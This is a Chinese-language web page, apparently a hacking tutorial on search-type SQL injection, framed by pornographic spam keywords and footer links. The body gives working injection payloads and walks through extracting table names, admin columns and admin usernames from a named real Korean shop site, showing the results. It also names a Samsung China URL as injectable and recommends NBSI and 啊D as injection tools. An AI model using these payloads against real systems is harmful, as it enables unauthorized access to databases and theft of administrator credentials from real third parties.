六月婷婷综合激情-六月婷婷综合-六月婷婷在线观看-六月婷婷在线-亚洲黄色在线网站-亚洲黄色在线观看网站

明輝手游網中心:是一個免費提供流行視頻軟件教程、在線學習分享的學習平臺!

ASP搜索型注入

[摘要]簡單的判斷搜索型注入漏洞存在不存在的辦法是先搜索',如果出錯,說明90%存在這個漏洞。然后搜索%,如果正常返回,說明95%有洞了。 然后再搜索一個關鍵字,比如2006吧,正常返回所有200...

簡單的判斷搜索型注入漏洞存在不存在的辦法是先搜索',如果出錯,說明90%存在這個漏洞。然后搜索%,如果正常返回,說明95%有洞了。 然后再搜索一個關鍵字,比如2006吧,正常返回所有2006相關的信息,再搜索2006%'and 1=1 and '%'='和2006%'and 1=2 and '%'=',存在異同的話,就是100%有洞了。 這里看出有上面說的洞后開始用nbsi來掃,結果總是超時,郁悶,看來要手工來暴需要的信息了。。。 http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and user>0 and '%'=' //得到當前數據庫賬號

http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and db_name()>0 and '%'=' //得到當前數據庫名

http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select count(*) from admin)>0 and '%'=' //返回錯誤頁面,看來是沒有admin這個表了

http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select top 1 name from lvhuana3.dbo.sysobjects where xtype='u' and status>0)>0 and '%'=' //得到當前數據庫的第一個表名

http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select top 1 name from lvhuana3.dbo.sysobjects where xtype='u' and status>0 and name not in('codechange'))>0 and '%'=' //得到當前數據庫的第二個表名

http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select top 1 name from lvhuana3.dbo.sysobjects where xtype='u' and status>0 and name not in('codechange','oldpoint'))>0 and '%'=' //得到當前數據庫的第三個表名

http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select top 1 name from lvhuana3.dbo.sysobjects where xtype='u' and status>0 and name not in('codechange','oldpoint','tbl_admin','tbl_afterservice','tbl_agent','tbl_bank','tbl_board','tbl_board2','tbl_brandbestLeft','tbl_brandbestRight','tbl_card','tbl_cart','tbl_catalogue','tbl_community','tbl_court','tbl_estimate','tbl_FAQ','tbl_mail_list','tbl_mem_add','tbl_mem_main','tbl_mem_out','tbl_mem_rboard','tbl_mileage','tbl_notice','tbl_ord_cash_receipt','tbl_ord_change''tbl_ord_cs','tbl_ord_change','tbl_ord_cs','tbl_ord_main','tbl_ord_payment','tbl_ord_prd','tbl_ord_prd_return','tbl_ord_refund','tbl_ord_req_main','tbl_ord_req_prd','tbl_ord_request','tbl_ord_user','tbl_partition','tbl_prd_category','tbl_prd_click','tbl_prd_desc','tbl_prd_grade','tbl_prd_main','tbl_prd_model','tbl_recommand','tbl_saleshop','tbl_search','tbl_tax','tbl_zipcode','tempDesc','tempdesc2','tempmodel','tempPrdMain','tempPrdmodel','tempsize','tempstyle','tmpordprd','tmpordprd2','trace1'))>0 and '%'=' //依次類推,得到所有的表 其實分析可以知道只有這個tbl_admin表才是最重要的。接著開始暴列名。
http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select top 1 col_name(object_id ('tbl_admin'),1) from tbl_admin)>0 and '%'=' //得到tbl_admin這個表里的第一個列名c_employee_id

http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select top 1 col_name(object_id ('tbl_admin'),2) from tbl_admin)>0 and '%'=' //得到tbl_admin這個表里的第二個列名c_employee_name

http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select top 1 col_name(object_id ('tbl_admin'),3) from tbl_admin)>0 and '%'=' //得到tbl_admin這個表里的第三個列名c_password

http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select top 1 col_name(object_id ('tbl_admin'),3) from tbl_admin)>0 and '%'=' //得到tbl_admin這個表里的第四個列名c_level 列名暴完,暴管理員賬號密碼。 http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select top 1 c_employee_id from tbl_admin)>0 and '%'=' //得到第一個管理員的id為943hoon

http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select c_employee_id from(select top 1 * from(select top 2 * from tbl_admin order by 1)T order by 1 desc)S)>0 and '%'=' //得到第二個管理員的id為champ

http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select c_employee_id from(select top 1 * from(select top 3 * from tbl_admin order by 1)T order by 1 desc)S)>0 and '%'=' //得到第三個管理員的id為clark

http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select c_employee_id from(select top 1 * from(select top 4 * from tbl_admin order by 1)T order by 1 desc)S)>0 and '%'=' //得到第四個管理員的id為hskim

http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select c_employee_id from(select top 1 * from(select top 4 * from tbl_admin order by 1)T order by 1 desc)S)>0 and '%'=' //得到第五個管理員的id為jajeong

http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select top 1 c_c_password from tbl_admin)>0 and '%'=' //這個語句是暴出管理員密碼的,可惜直接返回了正常頁面,郁悶。。。。 一會再想別的辦法吧。。。。。
另外說下,2.3 的啊D支持搜索型的注入方式是: 一般網站的搜索都是部分匹配的
有漏洞的url是http://notebook.samsung.com.cn/news/news.aspx?page=1&type=product&ST=title&SC=
構造注入語句 三星%'and 1=1 and '%'='
三星%'and 1=2 and '%'='
兩個返回頁面是不一樣的 說明有注入的漏洞 特征字 寫筆記本 就是三星%'and 1=1 and '%'=' 返回時有的 我一般搜索代碼是:
Select * from 表名 where 字段 like ’%關鍵字%’
這樣就造成了對關鍵字前后的所有匹配(%是用來全部匹配的)
這里如果關鍵字沒有過濾的話,就可以這樣來構造:
關鍵字=’ and [查詢條件] and ‘%’=’
這樣查詢就變成
select * from 表名 where 字段 like '%' and 1=1 and '%'='%'
這樣就很好的構成了一個sql注入點,當然用手工也可以,用nbsi也可以~~
注入是不分家的,沒必要什么型什么型的!~
《sql注入天書》的原話
第一節、SQL注入的一般步驟
首先,判斷環境,尋找注入點,判斷數據庫類型,這在入門篇已經講過了。
其次,根據注入參數類型,在腦海中重構SQL語句的原貌,按參數類型主要分為下面三種:
(A) ID=49 這類注入的參數是數字型,SQL語句原貌大致如下:
Select * from 表名 where 字段=49
注入的參數為ID=49 And [查詢條件],即是生成語句:
Select * from 表名 where 字段=49 And [查詢條件] (B) Class=連續劇這類注入的參數是字符型,SQL語句原貌大致概如下:
Select * from 表名 where 字段=’連續劇’
注入的參數為Class=連續劇’ and [查詢條件] and ‘’=’ ,即是生成語句:
Select * from 表名 where 字段=’連續劇’ and [查詢條件] and ‘’=’’
(C) 搜索時沒過濾參數的,如keyword=關鍵字,SQL語句原貌大致如下:
Select * from 表名 where 字段like ’%關鍵字%’
注入的參數為keyword=’ and [查詢條件] and ‘%’=’,即是生成語句:
Select * from 表名 where字段like ’%’ and [查詢條件] and ‘%’=’%’ 當然手工是麻煩的
用工具的話,我建議用nbsi的工具比較好,就我感覺只有nbsi結合了這個技術,用別的軟體是不能注入的
注入點只要寫:
http://notebook.samsung.com.cn/news/news.aspx?page=1&type=product&ST=title&SC=%
再加個特征字符就可以了


上面是電腦上網安全的一些基礎常識,學習了安全知識,幾乎可以讓你免費電腦中毒的煩擾。




主站蜘蛛池模板: 亚洲免费观看 | 在线久综合色手机在线播放 | 人人擦人人 | 新天堂网 | 探花网站| 色一情一乱一伦 | 最近最新免费视频8 | 青青草色 | 欧美性生活一级 | 青青草原免费在线 | 亚洲第一男人天堂 | 色呦呦视频在线观看 | 青青青视频在线播放视频 | 亚洲福利秒拍一区二区 | 欧美性理论片在线观看片免费 | 天天做天天爰夜夜爽 | 日日av | 四虎影院在线看 | 桃花综合久久久久久久久久网 | 日韩亚洲欧洲在线com91tv | 亚洲97i蜜桃网 | 亚洲第一成人在线 | 最近中文字幕无吗高清免费视频 | 日日摸夜夜摸狠狠摸日日碰夜夜做 | 日韩欧美精品在线视频 | 亚洲精品欧美精品国产精品 | 午夜国产精品影院在线观看 | 日本在线观看 | 青草国产精品久久久久久久久 | 午夜影院免费 | 日韩我不卡 | 日韩香蕉视频 | 小小的日本在线观看中文 | 欧美亚洲国产精品久久高清 | 性视频久久 | 天天干天天添 | 三级黄色在线免费观看 | 亚洲一区免费观看 | 深夜福利国产 | 中文字幕乱码系列免费 | 四虎影院在线观看网站 |